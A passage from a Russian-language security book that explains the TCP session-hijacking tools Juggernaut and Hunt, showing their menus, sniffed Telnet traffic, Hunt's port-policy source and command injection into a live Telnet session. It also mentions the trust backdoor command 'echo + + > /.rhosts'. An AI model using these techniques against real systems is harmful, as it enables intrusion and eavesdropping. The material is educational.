Чтение онлайн

Current Connection Database:

–

ref # source target

(1) 10.0.0.5 [2211] –> 10.0.0.10 [23]

–

Database is 0.20% to capacity.

[c,q] >

Указанная внизу экрана опция q, как и в большинстве других мест программы, возвращает пользователя к пункту 9 основного меню. Опция c очищает базу данных соединений. Для работы ниже перечисленных функций необходимо, чтобы в базе данных соединений была записана какая-то информация о соединениях. Поэтому функции прослушивания или перехвата сессии не будут работать до тех пор, пока программа работает с выбранной первой опцией. Вторая опция, «Шпионить за соединением» (Spy on a connection), предназначена для снифинга. Выбор этой опции позволяет следить за соединениями, представленными в списке подключений. Следующий пример взят из того же Telnet-соединения, что и в предыдущем случае.

Current Connection Database:

–

ref # source target

(1) 10.0.0.5 [2211] –> 10.0.0.10 [23]

–

Choose a connection [q] > 1

Do you wish to log to a file as well? [y/N] > y

Spying on connection, hit “ctrl-c” when done.

Spying on connection: 10.0.0.5 [2211] –> 10.0.0.10 [23]C

Disk Usage (Jul 3 06:01): Mail – 1705 kilobytes

File Repository – 162 kilobytes

Fax Repository – 1 kilobytes

109 Message(s) In New Mail

[TECNET:Main menu]?

Как

можно увидеть, у пользователя программы появилась возможность занести перехваченные данные в журнал регистрации. Опция 5 – это «Односторонний перехват соединения» (Simplex connection hijack). При выборе данной опции программа перехватывает соединение и посылает команду без отображения результатов на экране злоумышленника. Например:

Current Connection Database:

–

ref # source target

(1) 10.0.0.5 [2211] –> 10.0.0.10 [23]

–

Choose a connection [q] > 1

Enter the command string you wish executed [q] >

Напоследок рассмотрим опцию 6 «Интерактивный перехват соединения» (Interactive connection hijack). По своим функциям эта опция аналогична опции 5 («Односторонний перехват соединения»), но при ее выборе появляется возможность просмотреть результаты работы программы точно так же, как и при выборе опции 2 («Шпионить за соединением»). Вполне вероятно, что в большинстве случаев злоумышленник при перехвате соединения захочет воспользоваться именно этой опцией, для того чтобы иметь возможность видеть происходящее перед взломом. При этом если злоумышленник хочет работать скрытно, то вряд ли он будет использовать команду «echo + + > /.rhosts». С другой стороны, если пользователь в какой-то момент производит действия, приводящие к выводу большого количества данных, то злоумышленник, возможно, предпочтет работать вслепую, для того чтобы не загромождать свой экран выводом посторонних данных. Вот что может увидеть пользователь при выборе опции 6:

Current Connection Database:

–

ref # source target

(1) 10.0.0.5 [2211] –> 10.0.0.10 [23]

–

Choose a connection [q] > 1

Spying on connection, hit “ctrl-c” when you want to hijack.

NOTE: This will cause an ACK storm and desynch the client

until the connection is RST.

Spying on connection: 10.0.0.5 [2211] –> 10.0.0.10 [23]

Автор программы Juggernaut больше не поддерживает и не улучшает ее. Создается впечатление, что никто не делает этого, по крайней мере открыто. Автор программы Juggernaut написал усовершенствованную версию Juggernaut++ и однажды показал, как выглядят экранные формы программы, но он никогда не выпускал версию этой программ для всеобщего использования.

К моменту написания книги программе Juggernaut исполнилось уже несколько лет. Это большой промежуток времени для инструментальных средств обеспечения безопасности, а особенно для программы, которая активно не разрабатывается. У программы есть некоторые ограничения. Например, нельзя осуществить повторную синхронизацию соединения, а также невозможно работать с соединениями, в которых участвуют хосты с запущенной на них программой Juggernaut. Тем не менее эта программа будет работать на любых TCP-портах. (Другие инструментальные средства работают с Telnet или аналогичными протоколами.) Программа Juggernaut уже не является лучшей в этом классе программ, но тем не менее с познавательной точки зрения до сих пор очень полезно прочитать о проведенных автором программы Juggernaut исследованиях. По этому поводу прочтите оригинальную статью в журнале «Phrack».

Программа Hunt

Программа Hunt была создана Павлом Краузом (Pavel Krauz). Ее текущая версия 1.5. Складывается впечатление, что на момент выхода книги активная разработка программы не велась. Версия программы 1.5 была выпущена 30 мая 2000 года. Ее можно найти по адресу: http://lin.fsid.cvut.cz/~kra/index.html#HUNT.

Hunt является более амбициозным проектом, нежели Juggernaut. По крайней мере, он развился в такой проект. В соответствии с файлом readme, поставляемым вместе с дистрибутивом, одной из причин разработки Краузом программы Hunt было желание реализовать некоторые возможности, которые не были доступны в Juggernaut.

Как и в программе Juggernaut, у программы Hunt есть режимы анализа сетевого трафика (снифинга) и перехвата сессий. В отличие от Juggernaut, в программе Hunt реализованы средства спуфинга при работе с протоколом разрешения адресов ARP. С их помощью можно переслать через атакующую машину данные, посылаемые машиной жертвой, а также избежать перегрузки сети уведомлениями ACK (ACK storm), обычно сопутствующей перехвату TCP сессии. Вот как выглядит программа Hunt при запуске:

/*

* hunt 1.5

* multipurpose connection intruder / sniffer for Linux

* (c) 1998-2000 by kra

*/

starting hunt

– Main Menu – rcvpkt 0, free/alloc 63/64 –

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

– >

Строка – >

является приглашением пользователя к вводу команд. После нее ожидается ввод одной из команд из списка главного меню. По умолчанию, программа Hunt настроена на Telnet– и rlogin-соединения, но она написана таким образом, что можно легко добавить поддержку других типов соединений. Для этого в расположенном в файле hunt.c коде инициализации предусмотрена следующая строка:

add telnet rlogin policy;

Этафункция находится в файле addpolicy.c и выглядит следующим образом:

void add_telnet_rlogin_policy(void)

{

struct add_policy_info *api;

api = malloc(sizeof(struct add_policy_info));

assert(api);

memset(api, 0, sizeof(sizeof(struct add_policy_info)));

api->src_addr = 0;

api->src_mask = 0;

api->dst_addr = 0;

api->dst_mask = 0;

api->src_ports[0] = 0;

api->dst_ports[0] = htons(23);

api->dst_ports[1] = htons(513);

api->dst_ports[2] = 0;

list_push(&l_add_policy, api);

};

Из исходного текста функции видно, что для добавления новых возможностей достаточно просто добавить новые номера портов и затем перекомпилировать программу. Когда программа Hunt захватывает Telnet– или rlogin-соединение, она отображает его в меню списка соединений, как показано ниже:

– > l

0) 10.0.1.1 [3014] —> 130.212.2.65 [23]

– Main Menu – rcvpkt 2664, free/alloc 63/64 –

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

Первые две строчки – это то, что нас интересует. Программа Hunt часто обновляет меню сразу после введенной команды. Из приведенной экранной формы видно, что программа Hunt обнаружила Telnet-соединение. Ниже показан вызов режима наблюдения (снифинга) за соединением.

– > w

0) 10.0.1.1 [3014] —> 130.212.2.65 [23]

choose conn> 0

dump [s]rc/[d]st/[b]oth [b]> [cr]

print src/dst same characters y/n [n]> [cr]

CTRL-C to break

llss

<FF><FA>!<FF><F0><FF><FC><FF><FA>»FF><F0><FF><FA>»b

<FF><F0><FF><FE><FF><FA>»<FF><F0><FF><FA>»<82><E2> <82>

<82>

<82><82><82><82><82><FF><F0><FF><FA>!<FF><F0>

Apps/ Library/ Mailboxes/ Makefile

bookmarks.html

dead.letter mail/ proj1.c public_html/

<FF><FA>!<FF><F0><FF><FB><FF><FA>»<FF><F0><FF><FA>»<FF><FF>b<FF><FF>

<FF><FF>

<FF><FF>

<FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><F0><FF><FA>!<FF><F0>futon>

<FF><FD>

<FF><FA>“<FF><F0><FF><FA>”<82><FF><FF><E2><FF><FF> <82><FF><FF>

<82><FF><FF>

<82><FF><FF><82><FF><FF><82><FF><FF><82><FF><FF><82><FF><FF><FF><F0>

Например, пользователь программы Hunt запустил программу, захватил Telnet-соединение, выбрал режим наблюдения за ним, а затем перешел в Telnet-окно и набрал команду «ls». Команду «ls» (показанную как llss) можно увидеть ближе к началу приведенного выше протокола работы, за которой следует вывод данных в шестнадцатеричном формате, за которыми следуют файлы в директории пользователя, а затем опять шестнадцатеричный код. Вывод введенной команды «ls» в виде «llss» – результат отображения программой Hunt введенных пользователем символов с добавленным ответом сервера, возвращающего пользователю введенные им же символы. В итоге это выглядит как будто возможность вывода одних и тех же исходных и полученных символов, что работает не вполне корректно. Шестнадцатеричные символы являются форматирующими терминал-символами, которые обычно во время Telnet-сессии остаются за рамками рассмотрения. Конечно, в данном случае нас мало интересуют реализованные в программе Hunt возможности снифинга, хотя это и удобно. Главное – это понять, каким образом программа Hunt используется для перехвата сессий! Именно это демонстрируется ниже:

– > s

0) 10.0.1.1 [3014] –> 130.212.2.65 [23]

choose conn> 0

dump connection y/n [n]> [cr]

Enter the command string you wish executed or [cr]> cd Apps

<FF><FA>!<FF><F0>cd Apps

futon>

Тем временем вот что было отображено в Telnet-окне пользователя:

futon>

futon> cd Apps

futon>

Выходные данные были отображены на экране точно так же, как если бы они были введены в окне Telnet. Вернемся к программе Hunt: